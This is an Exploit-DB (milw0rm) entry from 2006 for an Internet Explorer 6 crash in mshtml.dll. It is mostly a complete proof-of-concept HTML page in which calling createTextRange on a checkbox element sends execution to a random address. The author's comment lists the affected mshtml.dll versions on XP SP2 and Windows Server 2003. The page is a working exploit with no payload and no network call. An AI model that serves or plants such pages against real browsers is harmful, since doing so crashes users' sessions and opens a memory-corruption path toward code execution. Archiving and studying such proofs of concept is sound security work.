MS Internet Explorer 6.0 (mshtml.dll checkbox) Crash
| EDB-ID: 1604 | CVE: N/A | OSVDB-ID: N/A |
| Author: Stelian Ene | Published: 2006-03-22 | Verified:  |
Exploit Code:  | Vulnerable App: N/A |
Rating |
| EDB-ID: 1604 | CVE: N/A | OSVDB-ID: N/A |
| Author: Stelian Ene | Published: 2006-03-22 | Verified: |
| Exploit Code: | Vulnerable App: N/A |
Rating |
<!--
Stelian Ene:
I can't find any info on this delicious IE bug, but it seems to be publicly known:
It will badly access a (virtual?) pointer table, making EIP to jump at a random
address. This has various effects on the system I've tested with, including
crashing. It works on these versions of mshtml.dll:
XP SP2: 6.0.2900.2802 - latest
WS2003: 6.0.3790.0
-->
<input type="checkbox" id='c'>
<script>
r=document.getElementById("c");
a=r.createTextRange();
</script>
# milw0rm.com [2006-03-22]